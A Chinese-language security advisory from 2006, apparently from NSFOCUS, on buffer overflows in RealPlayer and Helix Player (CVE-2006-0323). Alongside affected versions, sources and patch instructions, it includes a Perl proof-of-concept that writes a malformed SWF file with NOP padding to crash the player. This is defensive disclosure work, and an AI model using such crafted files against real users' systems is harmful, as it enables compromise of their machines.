安全研究

安全漏洞
RealNetworks产品多个缓冲区溢出漏洞

发布日期:2006-03-23
更新日期:2006-04-11

受影响系统:
Real Networks RealPlayer Enterprise 1.x
Real Networks RealPlayer 8.0
Real Networks RealPlayer 10.x
Real Networks RealOne Player V2
Real Networks RealOne Player V1
Red Hat Enterprise Linux WS 4 Extras
Red Hat Enterprise Linux WS 3 Extras
Red Hat Enterprise Linux ES 4 Extras
Red Hat Enterprise Linux ES 3 Extras
Red Hat Enterprise Linux AS 4 Extras
Red Hat Enterprise Linux AS 3 Extras
Real Networks Helix Player 1.x
Red Hat Desktop 4 Extras
Red Hat Desktop 3 Extras
Real Networks Rhapsody 3
描述:
BUGTRAQ  ID: 17202
CVE ID: CVE-2006-0323,CVE-2005-2310

RealNetworks提供各种媒体播放器,支持多种格式。

各种RealNetworks产品中存在多个溢出漏洞,允许攻击者入侵用户系统。

1) 处理SWF文件时的溢出漏洞允许在用户系统上执行任意代码;

2) 处理Web页面时存在堆溢出漏洞,允许在用户系统上执行任意代码;

3) 处理MBC文件时的溢出漏洞允许在用户系统上执行任意代码。

此外,在使用“CreateProcess()” API时的漏洞允许执行任意程序。

<*来源:John Heasman (nisr@nextgenss[.]com)
        Greg MacManus
        Sowhat (smaillist@gmail.com
  
  链接:http://secunia.com/advisories/19358/print/
        http://marc.theaimsgroup.com/?l=bugtraq&m=114477627031783&w=2
        http://www.idefense.com/intelligence/vulnerabilities/display.php?id=404
        http://lwn.net/Alerts/176852/?format=printable
        http://www.idefense.com/application/poi/display?id=340&type=vulnerabilities&flashstatus=true
        http://security.gentoo.org/glsa/glsa-200603-24.xml
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl
###################################################
# RealPlayer: Buffer overflow vulnerability / PoC
#
# CVE-2006-0323
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323
#
# RealNetworks Advisory
# http://service.real.com/realplayer/security/03162006_player/en/
#
# Federico L. Bossi Bonin
# fbossi[at]netcomm.com.ar
###################################################

# Program received signal SIGSEGV, Segmentation fault.
# [Switching to Thread -1218976064 (LWP 21932)]
# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so

my $EGGFILE="egg.swf";
my $header="\x46\x57\x53\x05\xCF\x00\x00\x00\x60";

my $endheader="\x19\xe4\x7d\x1c\xaf\xa3\x92\x0c\x72\xc1\x80\x00\xa2\x08\x01".
          "\x00\x00\x00\x00\x01\x02\x00\x01\x00\x00\x00\x02\x03\x00\x02".
          "\x00\x00\x00\x04\x04\x00\x03\x00\x00\x00\x08\x05\x00\x04\x00".
              "\x00\x00\x00\x89\x06\x06\x01\x00\x01\x00\x16\xfa\x1f\x40\x40".
          "\x00\x00\x00";


open(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\n";
print EGG $header;

for ($i = 0; $i < 135; $i++) {
$buffer.= "\x90";
}

print EGG $buffer;
print EGG $endheader;
close(EGG);

建议:
厂商补丁:

Real Networks
-------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://service.real.com/realplayer/security/03162006_player/zh-cn/

Red Hat
-------
RedHat已经为此发布了一个安全公告(RHSA-2006:0257-01)以及相应补丁:
RHSA-2006:0257-01:Critical: RealPlayer security update
链接:http://lwn.net/Alerts/176852/?format=printable

Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200603-24)以及相应补丁:
GLSA-200603-24:RealPlayer: Buffer overflow vulnerability
链接:http://security.gentoo.org/glsa/glsa-200603-24.xml

所有RealPlayer用户都应升级到最新版本:

     # emerge --sync
     # emerge --ask --oneshot --verbose ">=media-video/realplayer-10.0.7"

浏览次数:3977
严重程度:5(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障